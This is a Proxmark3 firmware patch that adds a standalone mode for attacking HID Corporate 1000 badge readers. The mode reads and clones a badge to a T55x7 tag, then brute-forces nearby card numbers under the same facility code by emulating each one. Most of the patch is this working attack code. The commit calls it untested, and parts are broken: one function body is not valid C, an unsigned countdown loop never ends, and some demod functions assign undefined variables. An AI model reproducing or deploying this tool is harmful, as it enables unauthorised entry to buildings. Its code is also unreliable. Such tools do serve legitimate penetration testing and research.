From fab1b64760180e96dc625a8a73dc552766fe4b3b Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Sun, 29 Oct 2017 03:26:46 +0100 Subject: [PATCH] ADD: standalone mode : LF HID corporate 1000 bruteforce by @federicodotta et al. https://github.com/federicodotta/proxmark3 --adjusted to fit iceman fork and latest enhancements to LF (untested) FIX: some calls to deviceside demods, use 0 instead of reference. ADD: timeout after n cycles of simulating --- armsrc/Makefile | 5 +- armsrc/Standalone/lf_hidbrute.c | 328 ++++++++++++++++++++++++++++++++ armsrc/Standalone/lf_hidbrute.h | 23 +++ armsrc/appmain.c | 34 ++-- armsrc/apps.h | 12 +- armsrc/lfops.c | 75 +++++--- 6 files changed, 427 insertions(+), 50 deletions(-) create mode 100644 armsrc/Standalone/lf_hidbrute.c create mode 100644 armsrc/Standalone/lf_hidbrute.h diff --git a/armsrc/Makefile b/armsrc/Makefile index e285f4e67..50cf3bb4a 100644 --- a/armsrc/Makefile +++ b/armsrc/Makefile @@ -35,7 +35,7 @@ APP_CFLAGS = -DWITH_CRC \ # -DWITH_LF_ICERUN # -DWITH_LF_SAMYRUN # -DWITH_LF_PROXBRUTE -# -DWITH_LF_HIDCORP +# -DWITH_LF_HIDBRUTE # -DWITH_HF_YOUNG # -DWITH_HF_MATTYRUN # -DWITH_HF_COLIN @@ -44,7 +44,7 @@ APP_CFLAGS = -DWITH_CRC \ SRC_LCD = fonts.c LCD.c SRC_LF = lfops.c hitag2.c hitagS.c lfsampling.c pcf7931.c lfdemod.c SRC_ISO15693 = iso15693.c iso15693tools.c -SRC_ISO14443a = iso14443a.c mifareutil.c mifarecmd.c mifaresniff.c epa.c +SRC_ISO14443a = iso14443a.c mifareutil.c mifarecmd.c mifaresniff.c epa.c mifaresim.c SRC_ISO14443b = iso14443b.c SRC_FELICA = felica.c SRC_CRAPTO1 = crypto1.c des.c aes.c desfire_key.c desfire_crypto.c mifaredesfire.c @@ -101,6 +101,7 @@ ARMSRC = fpgaloader.c \ cmd.c \ hf_young.c # lf_samyrun.c \ + # lf_hidbrute.c \ # Do not move this inclusion before the definition of {THUMB,ASM,ARM}SRC include ../common/Makefile.common diff --git a/armsrc/Standalone/lf_hidbrute.c b/armsrc/Standalone/lf_hidbrute.c new file mode 100644 index 000000000..bd7047cac --- /dev/null +++ b/armsrc/Standalone/lf_hidbrute.c @@ -0,0 +1,328 @@ +//----------------------------------------------------------------------------- +// Samy Kamkar, 2012 +// Federico Dotta, 2015 +// Maurizio Agazzini, 2015 +// Christian Herrmann, 2017 +// +// This code is licensed to you under the terms of the GNU GPL, version 2 or, +// at your option, any later version. See the LICENSE.txt file for the text of +// the license. +// +// PROXMARK3 - HID CORPORATE 1000 BRUTEFORCER (STAND-ALONE MODE) +// +// This version of Proxmark3 firmware adds one extra stand-alone mode to proxmark3 firmware. +// The new stand-alone mode allows to execute a bruteforce on HID Corporate 1000 readers, by +// reading a specific badge and bruteforcing the Card Number (incrementing and decrementing it), +// mainteining the same Facility Code of the original badge. +// +// Based on an idea of Brad Antoniewicz of McAfee® Foundstone® Professional Services (ProxBrute), +// the stand-alone mode has been rewritten in order to overcome some limitations of ProxBrute firmware, +// that does not consider parity bits. +// +// https://github.com/federicodotta/proxmark3 +// +//----------------------------------------------------------------------------------- +// main code for LF aka HID corporate brutefore by Federico Dotta & Maurizio Agazzini +//----------------------------------------------------------------------------------- +#include "lf_hidbrute.h" + +// samy's sniff and repeat routine for LF +void RunMod() { + StandAloneMode(); + FpgaDownloadAndGo(FPGA_BITSTREAM_LF); + + uint32_t high[OPTS], low[OPTS]; + int selected = 0; + int playing = 0; + int cardRead = 0; + + // Turn on selected LED + LED(selected + 1, 0); + + for (;;) { + WDT_HIT(); + + // exit from SamyRun, send a usbcommand. + if (usb_poll_validate_length()) break; + + // Was our button held down or pressed? + int button_pressed = BUTTON_HELD(1000); + //SpinDelay(300); + + // Button was held for a second, begin recording + if (button_pressed > 0 && cardRead == 0) { + LEDsoff(); + LED(selected + 1, 0); + LED(LED_RED2, 0); + + // record + DbpString("Starting recording"); + + // wait for button to be released + while(BUTTON_PRESS()) + WDT_HIT(); + + /* need this delay to prevent catching some weird data */ + SpinDelay(500); + + CmdHIDdemodFSK(1, &high[selected], &low[selected], 0); + Dbprintf("Recorded %x %x %08x", selected, high[selected], low[selected]); + + LEDsoff(); + LED(selected + 1, 0); + // Finished recording + // If we were previously playing, set playing off + // so next button push begins playing what we recorded + playing = 0; + cardRead = 1; + } + else if (button_pressed > 0 && cardRead == 1) { + LEDsoff(); + LED(selected + 1, 0); + LED(LED_ORANGE, 0); + + // record + Dbprintf("Cloning %x %x %08x", selected, high[selected], low[selected]); + + // wait for button to be released + while(BUTTON_PRESS()) + WDT_HIT(); + + /* need this delay to prevent catching some weird data */ + SpinDelay(500); + + CopyHIDtoT55x7(0, high[selected], low[selected], 0); + Dbprintf("Cloned %x %x %08x", selected, high[selected], low[selected]); + + LEDsoff(); + LED(selected + 1, 0); + // Finished recording + + // If we were previously playing, set playing off + // so next button push begins playing what we recorded + playing = 0; + cardRead = 0; + } + + // Change where to record (or begin playing) + else if (button_pressed) { + // Next option if we were previously playing + if (playing) + selected = (selected + 1) % OPTS; + playing = !playing; + + LEDsoff(); + LED(selected + 1, 0); + + // Begin transmitting + if (playing && selected != 2) { + + LED(LED_GREEN, 0); + DbpString("Playing"); + + // wait for button to be released + while (BUTTON_PRESS()) + WDT_HIT(); + + Dbprintf("%x %x %08x", selected, high[selected], low[selected]); + CmdHIDsimTAG(high[selected], low[selected], 0); + DbpString("Done playing"); + + if (BUTTON_HELD(1000) > 0) { + DbpString("Exiting"); + LEDsoff(); + return; + } + + /* We pressed a button so ignore it here with a delay */ + SpinDelay(300); + + // when done, we're done playing, move to next option + selected = (selected + 1) % OPTS; + playing = !playing; + LEDsoff(); + LED(selected + 1, 0); + } + else if (playing && selected == 2) + { + // Now it work only with HID Corporate 1000 (35bit), but is easily extensible to others RFID. + // It is necessary only to calculate the correct parity. + + // Brute force code + // Check if the badge is an HID Corporate 1000 + if( (high[selected] & 0xFFFFFFF8) != 0x28 ) { + DbpString("Card is not a HID Corporate 1000. Skipping bruteforce."); + continue; + } + + LED(LED_GREEN, 0); + DbpString("Entering bruteforce mode"); + // wait for button to be released + while (BUTTON_PRESS()) + WDT_HIT(); + + // Calculate Facility Code and Card Number from high and low + uint32_t cardnum = (low[selected] >> 1) & 0xFFFFF; + uint32_t fc = ((high[selected] & 1 ) << 11 ) | (low[selected] >> 21); + uint32_t original_cardnum = cardnum; + + Dbprintf("Proxbrute - starting decrementing card number"); + + while (cardnum >= 0) { + + // Needed for exiting from proxbrute when button is pressed + if (BUTTON_PRESS()) { + if (BUTTON_HELD(1000) > 0) { + DbpString("Exiting"); + LEDsoff(); + return; + } else { + while (BUTTON_PRESS()) { WDT_HIT(); } + break; + } + } + + // Decrement Card Number + cardnum--; + + // Calculate checksum of HID Corporate 1000 and set card number and facility code in high and low variables + hid_corporate_1000_calculate_checksum_and_set(&high[selected], &low[selected], cardnum, fc); + + // Print actual code to brute + Dbprintf("TAG ID: %x%08x (%d) - FC: %u - Card: %u", high[selected], low[selected], (low[selected] >> 1) & 0xFFFF, fc, cardnum); + + CmdHIDsimTAGEx(high[selected], low[selected], 1, 50000); + } + + cardnum = original_cardnum; + + Dbprintf("Proxbrute - starting incrementing card number"); + + while (cardnum <= 0xFFFFF) { + + // Needed for exiting from proxbrute when button is pressed + if (BUTTON_PRESS()) { + if (BUTTON_HELD(1000) > 0) { + DbpString("Exiting"); + LEDsoff(); + return; + } else { + while (BUTTON_PRESS()) { WDT_HIT(); } + break; + } + } + + // Decrement Card Number + cardnum++; + + // Calculate checksum of HID Corporate 1000 and set card number and facility code in high and low variables + hid_corporate_1000_calculate_checksum_and_set(&high[selected], &low[selected], cardnum, fc); + + // Print actual code to brute + Dbprintf("TAG ID: %x%08x (%d) - FC: %u - Card: %u", high[selected], low[selected], (low[selected] >> 1) & 0xFFFF, fc, cardnum); + + CmdHIDsimTAGEx(high[selected], low[selected], 1, 50000); + } + + DbpString("Done brute"); + if (BUTTON_HELD(1000) > 0) { + DbpString("Exiting"); + LEDsoff(); + return; + } + + /* We pressed a button so ignore it here with a delay */ + SpinDelay(300); + + // when done, we're done playing, move to next option + selected = (selected + 1) % OPTS; + playing = !playing; + LEDsoff(); + LED(selected + 1, 0); + + } else { + while(BUTTON_PRESS()) + WDT_HIT(); + } + } + } +} + +// Function that calculate next value for the brutforce of HID corporate 1000 +void hid_corporate_1000_calculate_checksum_and_set( uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc) { + + uint32_t new_high = 0; + uint32_t new_low = 0; + + // Calculate new high and low base value from card number and facility code, without parity + new_low = (fc << 21) | (cardnum << 1); + new_high = 0x28 | ((fc >> 11) & 1); // 0x28 is 101000 + + int n_ones; + uint32_t i; + + // Calculating and setting parity bit 34 + // Select only bit used for parity bit 34 in low number (10110110110110110110110110110110) + uint32_t parity_bit_34_low = new_low & 0xB6DB6DB6; + n_ones = 0; + // Calculate number of ones in low number + for ( i = 1; i != 0; i <<= 1) { + if( parity_bit_34_low & i ) + n_ones++; + } + // Calculate number of ones in high number + if (new_high & 1) + n_ones++; + + // Set parity bit (Even parity) + if (n_ones % 2) + new_high = new_high | 0x2; + + // Calculating and setting parity bit 1 + // Select only bit used for parity bit 1 in low number (01101101101101101101101101101100) + uint32_t parity_bit_1_low = new_low & 0x6DB6DB6C; + n_ones = 0; + + // Calculate number of ones in low number + for ( i=1; i != 0; i <<= 1) { + if( parity_bit_1_low & i ) + n_ones++; + } + // Calculate number of ones in high number + if ( new_high & 0x1) + n_ones++; + + if ( new_high & 0x2) + n_ones++; + + // Set parity bit (Odd parity) + if (!(n_ones % 2)) + new_low = new_low | 0x1; + + // Calculating and setting parity bit 35 + n_ones = 0; + // Calculate number of ones in low number (all bit of low, bitmask unnecessary) + for (i = 1; i != 0; i <<= 1) { + if ( new_low & i ) + n_ones++; + } + // Calculate number of ones in high number + if ( new_high & 0x1) + n_ones++; + + if ( new_high & 0x2) + n_ones++; + + // Set parity bit (Odd parity) + if (!(n_ones % 2)) + new_high = new_high | 0x4; + + // Setting new calculated values + *low = new_low; + *high = new_high; +} + +// prepare a waveform pattern in the buffer based on the ID given then +// simulate a HID tag until the button is pressed or after #numcycles cycles +// Used to bruteforce HID in standalone mode. + diff --git a/armsrc/Standalone/lf_hidbrute.h b/armsrc/Standalone/lf_hidbrute.h new file mode 100644 index 000000000..5a7bf32dc --- /dev/null +++ b/armsrc/Standalone/lf_hidbrute.h @@ -0,0 +1,23 @@ +//----------------------------------------------------------------------------- +// Samy Kamkar 2012 +// Christian Herrmann, 2017 +// +// This code is licensed to you under the terms of the GNU GPL, version 2 or, +// at your option, any later version. See the LICENSE.txt file for the text of +// the license. +//----------------------------------------------------------------------------- +// StandAlone Mod +//----------------------------------------------------------------------------- + +#ifndef __LF_SAMYRUN_H +#define __LF_SAMYRUN_H + +//#include // for bool +#include "standalone.h" // standalone definitions +#include "apps.h" // debugstatements, lfops? + +#define OPTS 3 + +void hid_corporate_1000_calculate_checksum_and_set( uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc); + +#endif /* __LF_SAMYRUN_H */ \ No newline at end of file diff --git a/armsrc/appmain.c b/armsrc/appmain.c index 1656d7b23..97bbab48d 100644 --- a/armsrc/appmain.c +++ b/armsrc/appmain.c @@ -392,8 +392,8 @@ void printStandAloneModes(void) { #if defined(WITH_LF_PROXBRUTE) DbpString(" LF HID ProxII bruteforce - aka Proxbrute (Brad Antoniewicz)"); #endif - #if defined(WITH_LF_HIDCORP) - DbpString(" LF HID corporate 1000 bruteforce - (Federi Codotta)"); + #if defined(WITH_LF_HIDBRUTE) + DbpString(" LF HID corporate 1000 bruteforce - (Federico dotta & Maurizio Agazzini)"); #endif #if defined(WITH_HF_MATTYRUN) DbpString(" HF Mifare sniff/clone - aka MattyRun (Matta Real)"); @@ -585,9 +585,11 @@ void UsbPacketReceived(uint8_t *packet, int len) { cmd_send(CMD_ACK, bits, 0, 0, 0, 0); break; } - case CMD_HID_DEMOD_FSK: - CmdHIDdemodFSK(c->arg[0], 0, 0, 1); + case CMD_HID_DEMOD_FSK: { + uint32_t high, low; + CmdHIDdemodFSK(c->arg[0], &high, &low, 1); break; + } case CMD_HID_SIM_TAG: CmdHIDsimTAG(c->arg[0], c->arg[1], 1); break; @@ -603,15 +605,19 @@ void UsbPacketReceived(uint8_t *packet, int len) { case CMD_HID_CLONE_TAG: CopyHIDtoT55x7(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes[0]); break; - case CMD_IO_DEMOD_FSK: - CmdIOdemodFSK(c->arg[0], 0, 0, 1); + case CMD_IO_DEMOD_FSK: { + uint32_t high, low; + CmdIOdemodFSK(c->arg[0], &high, &low, 1); break; + } case CMD_IO_CLONE_TAG: CopyIOtoT55x7(c->arg[0], c->arg[1]); break; - case CMD_EM410X_DEMOD: - CmdEM410xdemod(c->arg[0], 0, 0, 1); + case CMD_EM410X_DEMOD: { + uint32_t high, low; + CmdEM410xdemod(c->arg[0], &high, &low, 1); break; + } case CMD_EM410X_WRITE_TAG: WriteEM410x(c->arg[0], c->arg[1], c->arg[2]); break; @@ -660,9 +666,12 @@ void UsbPacketReceived(uint8_t *packet, int len) { case CMD_EM4X_WRITE_WORD: EM4xWriteWord(c->arg[0], c->arg[1], c->arg[2]); break; - case CMD_AWID_DEMOD_FSK: // Set realtime AWID demodulation - CmdAWIDdemodFSK(c->arg[0], 0, 0, 1); + case CMD_AWID_DEMOD_FSK: { + uint32_t high, low; + // Set realtime AWID demodulation + CmdAWIDdemodFSK(c->arg[0], &high, &low, 1); break; + } case CMD_VIKING_CLONE_TAG: CopyVikingtoT55xx(c->arg[0], c->arg[1], c->arg[2]); break; @@ -1195,13 +1204,14 @@ void __attribute__((noreturn)) AppMain(void) { * All standalone mod "main loop" should be the RunMod() function. * Since the standalone is either LF or HF, the somewhat bisarr defines below exists. */ -#if defined (WITH_LF) && defined (WITH_LF_SAMYRUN) +#if defined (WITH_LF) && ( defined (WITH_LF_SAMYRUN) || defined (WITH_LF_HIDBRUTE) ) RunMod(); #endif -#if defined (WITH_ISO14443a) && defined (WITH_HF_YOUNG) +#if defined (WITH_ISO14443a) && defined (WITH_HF_YOUNG) RunMod(); #endif + // when here, we are no longer in standalone mode. // reseting the variables which keeps track of usb re-attached/configured //SetUSBreconnect(0); diff --git a/armsrc/apps.h b/armsrc/apps.h index d23efa17f..6e031f07a 100644 --- a/armsrc/apps.h +++ b/armsrc/apps.h @@ -79,16 +79,18 @@ void WriteTItag(uint32_t idhi, uint32_t idlo, uint16_t crc); void AcquireTiType(void); void AcquireRawBitsTI(void); +void SimulateTagLowFrequencyEx(int period, int gap, int ledcontrol, int numcycles); void SimulateTagLowFrequency(int period, int gap, int ledcontrol); void SimulateTagLowFrequencyBidir(int divisor, int max_bitlen); -void CmdHIDsimTAG(int hi, int lo, int ledcontrol); +void CmdHIDsimTAGEx(uint32_t hi, uint32_t lo, int ledcontrol, int numcycles); +void CmdHIDsimTAG(uint32_t hi, uint32_t lo, int ledcontrol); void CmdFSKsimTAG(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); void CmdASKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); void CmdPSKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); -void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol); -void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol); // Realtime demodulation mode for AWID26 -void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol); -void CmdIOdemodFSK(int findone, int *high, int *low, int ledcontrol); +void CmdHIDdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol); +void CmdAWIDdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol); // Realtime demodulation mode for AWID26 +void CmdEM410xdemod(int findone, uint32_t *high, uint32_t *low, int ledcontrol); +void CmdIOdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol); void CopyIOtoT55x7(uint32_t hi, uint32_t lo); // Clone an ioProx card to T5557/T5567 void CopyHIDtoT55x7(uint32_t hi2, uint32_t hi, uint32_t lo, uint8_t longFMT); // Clone an HID card to T5557/T5567 void CopyVikingtoT55xx(uint32_t block1, uint32_t block2, uint8_t Q5); diff --git a/armsrc/lfops.c b/armsrc/lfops.c index 7058b282f..e88576334 100644 --- a/armsrc/lfops.c +++ b/armsrc/lfops.c @@ -395,8 +395,7 @@ void WriteTItag(uint32_t idhi, uint32_t idlo, uint16_t crc) StopTicks(); } -void SimulateTagLowFrequency(int period, int gap, int ledcontrol) -{ +void SimulateTagLowFrequencyEx(int period, int gap, int ledcontrol, int numcycles) { // note this may destroy the bigbuf so be sure this is called before now... //FpgaDownloadAndGo(FPGA_BITSTREAM_LF); @@ -404,7 +403,6 @@ void SimulateTagLowFrequency(int period, int gap, int ledcontrol) FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_EDGE_DETECT); SpinDelay(20); - #define BREAK_OUT_LIMIT int i = 0; uint8_t *buf = BigBuf_get_addr(); @@ -424,6 +422,15 @@ void SimulateTagLowFrequency(int period, int gap, int ledcontrol) for(;;) { + if ( numcycles > -1 ) { + if ( x != numcycles ) { + ++x; + } else { + // exit without turning of field + return; + } + } + if (ledcontrol) LED_D_ON(); // wait until SSC_CLK goes HIGH @@ -461,9 +468,13 @@ void SimulateTagLowFrequency(int period, int gap, int ledcontrol) OUT: FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); LED_D_OFF(); - return; } +void SimulateTagLowFrequency(int period, int gap, int ledcontrol) { + SimulateTagLowFrequencyEx(period, gap, ledcontrol, -1); +} + + #define DEBUG_FRAME_CONTENTS 1 void SimulateTagLowFrequencyBidir(int divisor, int t0) { @@ -563,7 +574,7 @@ static void fcAll(uint8_t fc, int *n, uint8_t clock, uint16_t *modCnt) // prepare a waveform pattern in the buffer based on the ID given then // simulate a HID tag until the button is pressed -void CmdHIDsimTAG(int hi, int lo, int ledcontrol) { +void CmdHIDsimTAGEx( uint32_t hi, uint32_t lo, int ledcontrol, int numcycles) { if (hi > 0xFFF) { DbpString("Tags can only have 44 bits. - USE lf simfsk for larger tags"); @@ -618,10 +629,14 @@ void CmdHIDsimTAG(int hi, int lo, int ledcontrol) { } if (ledcontrol) LED_A_ON(); - SimulateTagLowFrequency(n, 0, ledcontrol); + SimulateTagLowFrequencyEx(n, 0, ledcontrol, numcycles); if (ledcontrol) LED_A_OFF(); } +void CmdHIDsimTAG( uint32_t hi, uint32_t lo, int ledcontrol) { + void CmdHIDsimTAG( hi, lo, ledcontrol, -1) +} + // prepare a waveform pattern in the buffer based on the ID given then // simulate a FSK tag until the button is pressed // arg1 contains fcHigh and fcLow, arg2 contains STT marker and clock @@ -800,12 +815,11 @@ void CmdPSKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream) } // loop to get raw HID waveform then FSK demodulate the TAG ID from it -void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol) -{ +void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol) { uint8_t *dest = BigBuf_get_addr(); size_t size = 0; - uint32_t hi2=0, hi=0, lo=0; - int idx=0; + uint32_t hi2 = 0, hi = 0, lo = 0; + int idx = 0; int dummyIdx = 0; // Configure to go in 125Khz listen mode LFSetupFPGAForADC(95, true); @@ -813,7 +827,7 @@ void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol) //clear read buffer BigBuf_Clear_keep_EM(); - while(!BUTTON_PRESS() && !usb_poll_validate_length()) { + while( !BUTTON_PRESS() && !usb_poll_validate_length()) { WDT_HIT(); if (ledcontrol) LED_A_ON(); @@ -899,8 +913,7 @@ void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol) } // loop to get raw HID waveform then FSK demodulate the TAG ID from it -void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol) -{ +void CmdAWIDdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol) { uint8_t *dest = BigBuf_get_addr(); size_t size; int idx=0, dummyIdx=0; @@ -978,6 +991,8 @@ void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol) } if (findone){ if (ledcontrol) LED_A_OFF(); + *high = hi; + *low = lo; break; } // reset @@ -989,8 +1004,7 @@ void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol) if (ledcontrol) LED_A_OFF(); } -void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol) -{ +void CmdEM410xdemod(int findone, uint32_t *high, uint32_t *low, int ledcontrol) { uint8_t *dest = BigBuf_get_addr(); size_t size=0, idx=0; @@ -1037,8 +1051,8 @@ void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol) if (findone){ if (ledcontrol) LED_A_OFF(); - *high=lo>>32; - *low=lo & 0xFFFFFFFF; + *high = hi; + *low = lo; break; } } @@ -1051,25 +1065,24 @@ void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol) if (ledcontrol) LED_A_OFF(); } -void CmdIOdemodFSK(int findone, int *high, int *low, int ledcontrol) -{ +void CmdIOdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol) { uint8_t *dest = BigBuf_get_addr(); int dummyIdx = 0; int idx = 0; - uint32_t code=0, code2=0; - uint8_t version=0; - uint8_t facilitycode=0; - uint16_t number=0; + uint32_t code = 0, code2 = 0; + uint8_t version = 0; + uint8_t facilitycode = 0; + uint16_t number = 0; uint8_t crc = 0; uint16_t calccrc = 0; size_t size = BigBuf_max_traceLen(); - //clear read buffer + BigBuf_Clear_keep_EM(); // Configure to go in 125Khz listen mode LFSetupFPGAForADC(95, true); - while(!BUTTON_PRESS() && !usb_poll_validate_length()) { + while (!BUTTON_PRESS() && !usb_poll_validate_length()) { WDT_HIT(); if (ledcontrol) LED_A_ON(); DoAcquisition_default(-1,true); @@ -1124,14 +1137,14 @@ void CmdIOdemodFSK(int findone, int *high, int *low, int ledcontrol) // if we're only looking for one tag if (findone){ if (ledcontrol) LED_A_OFF(); - *high=code; - *low=code2; + *high = hi; + *low = lo; break; } - code=code2=0; - version=facilitycode=0; - number=0; - idx=0; + code = code2 = 0; + version = facilitycode = 0; + number = 0; + idx = 0; WDT_HIT(); }